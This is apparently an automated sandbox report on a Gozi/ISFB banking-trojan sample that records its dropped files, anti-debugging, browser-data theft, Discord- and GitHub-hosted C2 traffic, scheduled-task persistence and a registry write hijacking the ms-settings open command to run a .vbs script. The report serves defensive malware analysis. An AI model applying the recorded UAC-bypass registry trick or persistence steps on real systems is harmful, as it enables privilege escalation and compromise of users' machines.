Malware Analysis Report

2025-01-22 18:50

Sample ID: 240311-wmp26aaa7t
Target: gen_build.zip
SHA256: 550f5faa4bdd6e5e435a19b6d77af1eace8750c5a9372d71f390454a949215f0
Tags: gozi banker isfb spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 550f5faa4bdd6e5e435a19b6d77af1eace8750c5a9372d71f390454a949215f0

Threat Level: Known bad

The file gen_build.zip was found to be: Known bad.

Malicious Activity Summary

gozi banker isfb spyware stealer trojan

Gozi

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Enumerates system info in registry

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-11 18:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-11 18:02

Reported

2024-03-11 18:33

Platform

win11-20240221-en

Max time kernel

1800s

Max time network

1809s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi

banker trojan gozi

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133546538350743638" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\chinahalf1930182.vbs" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3084248216-1643706459-906455512-1000\{F3BA821A-C5BB-416B-BBC5-844D38F2A77A} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Key created \Registry\User\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\NotificationData C:\Windows\Explorer.EXE N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\gen_build.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe:Zone.Identifier C:\Windows\Explorer.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
